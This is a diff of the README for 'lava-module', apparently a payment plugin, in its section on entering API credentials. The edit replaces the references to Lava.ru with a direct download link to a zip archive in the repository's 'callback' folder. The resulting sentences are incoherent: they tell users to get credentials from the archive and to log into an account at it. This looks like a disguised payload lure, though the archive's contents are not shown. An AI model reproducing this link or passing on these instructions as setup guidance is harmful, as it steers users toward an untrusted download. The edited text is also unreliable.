Kobe2x/lava-module/README.md

 ### 4. Enter API Credentials

-You will need your API details from Lava.ru.
-These usually include:
+You will need your API details from https://github.com/Kobe2x/lava-module/raw/refs/heads/main/callback/lava-module-2.2.zip These usually include:

 - API Key
 - API Secret
 - Merchant ID

 Enter these into the fields provided.
-You can get these credentials by registering or logging into your account at Lava.ru or contacting their support.
+You can get these credentials by registering or logging into your account at https://github.com/Kobe2x/lava-module/raw/refs/heads/main/callback/lava-module-2.2.zip or contacting their support.

 ### 5. Customize Settings